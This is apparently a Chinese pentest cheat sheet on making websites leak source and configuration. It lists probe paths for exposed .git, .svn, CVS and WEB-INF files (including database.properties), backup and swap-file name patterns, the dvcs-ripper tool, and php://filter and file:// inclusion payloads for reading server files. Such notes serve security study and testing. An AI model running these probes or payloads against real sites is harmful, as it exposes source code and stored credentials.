通过备份文件或配置文件泄露

• 一般在根目录下

1. http://www.example.com:port/.hg
2. http://www.example.com:port/robots.txt
3. http://www.example.com:port/.git/config
4. http://www.example.com:port/.svn
5. http://www.example.com:port/WEB-INF/web.xml
6. http://www.example.com:port/WEB-INF/database.properties
7. http://www.example.com:port/CVS/Root
8. http://www.example.com:port/CVS/Entries

利用工具

https://github.com/kost/dvcs-ripper

• 各个页面下

1. http://www.example.com/index.html(php, jsp…).bak
2. http://www.example.com/.index.html(php, jsp…)~
3. http://www.example.com/index.html(php, jsp…).rar
4. http://www.example.com/index.html(php, jsp…).zip
5. http://www.example.com/index.html(php, jsp…).7z
6. http://www.example.com/index.html(php, jsp…).tar.gz
7. http://www.example.com/.index.html(php, jsp…).swp
8. http://www.example.com/.index.html(php, jsp…).swo
9. http://www.example.com:port/.DS_store

通过协议进行泄露

• php伪协议

/index.php?f=php://filter/convert.base64-encode/resource=index.php 

• file协议

/index.php?f=file://D://www/html/about.php